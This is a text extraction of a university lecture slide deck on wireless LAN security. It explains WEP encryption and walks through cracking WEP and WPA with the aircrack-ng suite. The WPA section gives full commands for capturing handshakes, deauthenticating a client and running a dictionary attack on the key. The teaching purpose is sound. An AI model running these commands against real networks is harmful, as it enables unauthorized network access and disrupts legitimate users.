wlan security: cracking wep/wpa
DESCRIPTION
Wireless LANs 2011. WLAN Security: Cracking WEP/WPA. รศ. ดร . อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. [email protected] http://www.cpe.ku.ac.th/~anan Computer Engineering Department Kasetsart University, Bangkok, Thailand. Secret Key (40-bit or 128-bit). IV. Initialization - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/1.jpg)
1
WLAN Security:Cracking WEP/WPA
รศ. ดร. อนันต์ ผลเพิม่Assoc. Prof. Anan Phonphoem, Ph.D.
[email protected]://www.cpe.ku.ac.th/~anan
Computer Engineering DepartmentKasetsart University, Bangkok, Thailand
Wireless LANs2011
![Page 2: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/2.jpg)
WEP Block Diagram
2
WEP Frame
IntegrityAlgorithm(CRC-32)
Pseudo-RandomNumber Generator
RC-4
+
BitwiseXOR
Plain Text
Cipher Text
Integrity CheckValue (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
InitializationVector (IV)
IV
Encryption BlockSender Site
IntegrityAlgorithm
Pseudo-RandomNumber Generator
BitwiseXOR
Cipher TextPlain Text
Integrity CheckValue (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
Decryption BlockReceiver Site
![Page 3: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/3.jpg)
3
WEP – Encoding
IntegrityAlgorithm(CRC-32)
Pseudo-RandomNumber Generator
RC-4
+
BitwiseXOR
Plain Text
Cipher Text
Integrity CheckValue (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
InitializationVector (IV)
IV
![Page 4: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/4.jpg)
4
WEP Frame
Frame Header
IV Header Frame Body ICV
Trailer FCS
EncryptedClear Text Clear Text
4 bytes
4 bytes
![Page 5: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/5.jpg)
5
WEP – Decryption
IntegrityAlgorithm
Pseudo-RandomNumber Generator
BitwiseXORCipher Text
Plain Text
Integrity CheckValue (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
![Page 6: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/6.jpg)
Cracking WEP
6
![Page 7: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/7.jpg)
7
Cracking Steps1) Reconnaissance (Collect target info.)
[kismet]2) Run promiscuous mode [iwconfig,
airmon]3) Collect data [airodump]4) Crack key [aircrack]
![Page 8: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/8.jpg)
8
Default SSIDs
![Page 9: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/9.jpg)
9
1) Reconnaissance (Collect target info.)
![Page 10: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/10.jpg)
10
Kismet (Reconnaissance)
![Page 11: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/11.jpg)
11
Kismet (AP Info.)
![Page 12: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/12.jpg)
12
Kismet (Client Info.)
![Page 13: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/13.jpg)
13
2) Run promiscuous mode
![Page 14: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/14.jpg)
14
1 2
3 4
Regular Behavior
Station 1 transmits to all (broadcast)
![Page 15: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/15.jpg)
15
1 2
3 4
Intention to Eavesdrop
Promiscuousmode
Station 1 transmits to station 4
![Page 16: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/16.jpg)
16
iwconfig
![Page 17: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/17.jpg)
iwlist
17
![Page 18: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/18.jpg)
Promiscuous Mode Setup
• By using iwconfig
18
![Page 19: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/19.jpg)
Promiscuous Mode Setup
• By using airmon-ng
19
![Page 20: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/20.jpg)
Promiscuous Mode Setup
20
![Page 21: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/21.jpg)
21
3) Collect data
![Page 22: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/22.jpg)
22
airodumpFrom Kismet
![Page 23: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/23.jpg)
Airodump problemroot@APMoose:~/toulouse# airodump-ng mon0ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”
anan@APMoose:~$ rfkill list0: phy0: Wireless LAN
Soft blocked: no software can reactivateHard blocked: no software cannot reactivate
1: acer-wireless: Wireless LANSoft blocked: noHard blocked: no
2: acer-bluetooth: BluetoothSoft blocked: noHard blocked: no
4: hci0: BluetoothSoft blocked: noHard blocked: no
Solve by:root@APMoose:~/toulouse# rfkill unblock all
23
![Page 24: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/24.jpg)
24
airodump
![Page 25: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/25.jpg)
25
airodump data files
![Page 26: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/26.jpg)
26
4) Crack Key
![Page 27: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/27.jpg)
aircrack• For non-encryption
27
![Page 28: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/28.jpg)
28
aircrack
![Page 29: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/29.jpg)
29
WEP Cracking Demo
![Page 30: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/30.jpg)
Cracking WPA
30
![Page 31: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/31.jpg)
Cracking Steps1)Start the wireless interface in monitor
mode on the specific AP channel2)Start airodump-ng on AP channel with
filter for bssid to collect authentication handshake
3)Use aireplay-ng to deauthenticate the wireless client
4)Run aircrack-ng to crack the pre-shared key using the authentication handshake
31http://www.aircrack-ng.org/doku.php?id=cracking_wpa
![Page 32: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/32.jpg)
32
1) Start Monitoring Mode
![Page 33: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/33.jpg)
Check interface
33
![Page 34: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/34.jpg)
iwconfig
34
![Page 35: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/35.jpg)
Start monitoring mode
35
![Page 36: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/36.jpg)
36
2) Start airodump-ngcollect authentication handshake
![Page 37: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/37.jpg)
Start airodump-ng
37
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter Description-c 6 Wireless channel--bssid 00:1E:F7:xx:xx:xx
AP’s MAC
-w psk File name prefix (contain Ivs)mon0 Interface name
![Page 38: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/38.jpg)
Start airodump-ng less parameter
38
Moose# airodump-ng -w psk mon0
![Page 39: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/39.jpg)
39
3) Deauthenticate client
![Page 40: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/40.jpg)
aireplay
40
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter Description-0 deauthentication1 # deauthentication sent-a 00:12:01:xx:xx:xx AP’s MAC -c 00:23:11:xx:xx:xx Deauthing client’s MAC-mon0 Interface name
![Page 41: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/41.jpg)
41
4) Crack
![Page 42: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/42.jpg)
Need a dictionary
42
Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap
![Page 43: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/43.jpg)
With dictionary
43
Moose# aircrack-ng -w password.lst -psk*.cap
![Page 44: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/44.jpg)
Handshake found
44http://www.aircrack-ng.org/doku.php?id=cracking_wpa
![Page 45: WLAN Security: Cracking WEP/WPA](https://reader034.vdocuments.pub/reader034/viewer/2022051221/5681619f550346895dd15870/html5/thumbnails/45.jpg)
Successfully Crack
45http://www.aircrack-ng.org/doku.php?id=cracking_wpa